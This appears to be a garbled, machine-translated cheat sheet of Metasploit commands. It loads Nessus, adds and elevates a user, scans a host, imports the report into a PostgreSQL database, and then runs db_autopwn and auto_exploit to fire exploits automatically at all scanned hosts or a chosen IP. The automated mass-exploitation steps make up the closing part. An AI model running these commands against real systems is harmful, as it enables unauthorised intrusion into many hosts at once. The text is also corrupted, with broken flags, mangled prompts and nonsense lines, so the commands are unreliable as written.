MSF > Load Nessus
MSF > Nessus_connect fuckyou:[email Protected] Connect on Nessus
MSF > Nessus_user_add <username> <password> Add a Nessus user
Elevate the test user to admin
[Email protected]:# nessus-admin
Login:xxxooo
Yest is isn't an administrative user. Does want to grant him admin rights? [y/n] Y
Test is now an administrator
MSF > nessus_user_list View the list of users
MSF > nessus_policy_list Select a scan rule
ID Name Comments
— —- ——–
-1 Prepare for PCI-DSS audits (Section 11.2.2)
-2 Web App Tests
-3 External Network Scan
-4 Internal Network Scan
MSF > Nessus_scan_new
[*] Usage:
[*] nessus_scan_new <policy id> <scan name> <targets>
[*] Use Nessus_policy_list to list all available policies
MSF > Nessus_scan_new-2 testabc 192.168.1.100 New Scan task
MSF > nessus_scan_status View scan status
MSF > nessus_report_list View a list of scan reports
MSF > Nessus_report_list UID Queries specify scan report details
MSF > nessus_report_host_ports IP UID Lists scan results for specified IP
MSF > Nessus_report_host_detail IP Port TCP UID View specified IP address specify port scan detail results
MSF > Nessus_report_get Import a scan report
MSF > Hosts-c address,os_name,os_flavor,os_sp,vulns View scan Results
MSF > Vulns Viewing of scanned host vulnerabilities
Batch overflow with Auto_exploit
Open PostgreSQL to create a database
[Email protected]:# service PostgreSQL start
[Email protected]:~# psql-u postgres-h localhost
Enter "Help" for information.
postgres=# CREATE DATABASE testabc;
CREATE DATABASE
postgres=#
MSF > Db_status MSF connect PostgreSQL
MSF > Db_connect postgres:[email PROTECTED]:5432/TESTABC
MSF > Nessus_report_list View nessus Reports and import a report
MSF > Load Auto_exploit load auto_exploit, perform vuln_exploit overflow
MSF > Load DB_AUTOPWN
MSF > Db_autopwn-t-p-e (auto tools all IP)
MSF > Db_autopwn-t-p-i ip-e (attacks on designated IP hosts)
Reference Links:
http://darkoperator.squarespace.com/blog/?currentPage=10
Metasploit Db_autopwn & Load Nessus